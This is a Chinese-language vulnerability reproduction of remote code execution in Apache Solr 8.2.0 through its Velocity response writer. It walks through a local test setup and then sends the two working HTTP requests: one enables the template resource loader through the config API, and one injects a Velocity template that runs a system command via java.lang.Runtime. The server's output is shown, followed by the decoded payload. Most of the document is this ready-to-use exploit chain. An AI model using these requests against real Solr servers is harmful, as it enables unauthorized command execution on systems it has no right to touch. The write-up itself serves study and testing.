参考链接:
https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
https://lucene.apache.org/solr/guide/8_2/config-api.html
https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
0x01 环境配置
C:\solr-8.2.0\bin λ solr.cmd start -p 8983 Java HotSpot(TM) 64-Bit Server VM warning: JVM cannot use large page memory because it does not have enough privilege to lock pages in memory. Unable to get Charset 'cp65001' for property 'sun.stderr.encoding', using default GBK and continuing. Waiting up to 30 to see Solr running on port 8983 Started Solr server on port 8983. Happy searching! C:\solr-8.2.0\bin λ solr.cmd create -c test111 WARNING: Using _default configset with data driven schema functionality. NOT RECOMMENDED for production use. To turn off: bin\solr config -c test111 -p 8983 -action set-user-property -property update.autoCreateFields -value false Unable to get Charset 'cp65001' for property 'sun.stderr.encoding', using default GBK and continuing. Created new core 'test111' C:\solr-8.2.0\bin
0x02 测试payload
发送第一个请求
POST /solr/test111/config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
HTTP/1.1 200 OK Content-Type: text/plain;charset=utf-8 Content-Length: 150 { "responseHeader":{ "status":0, "QTime":9574}, "WARNING":"This response format is experimental. It is likely to change in the future."}
发送第二个请求
GET /solr/test111/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: localhost:8983
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8 Content-Length: 58 0 uid=197608(lzhd24) gid=197121 groups=197121
0x03 payload分析
#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read())) #end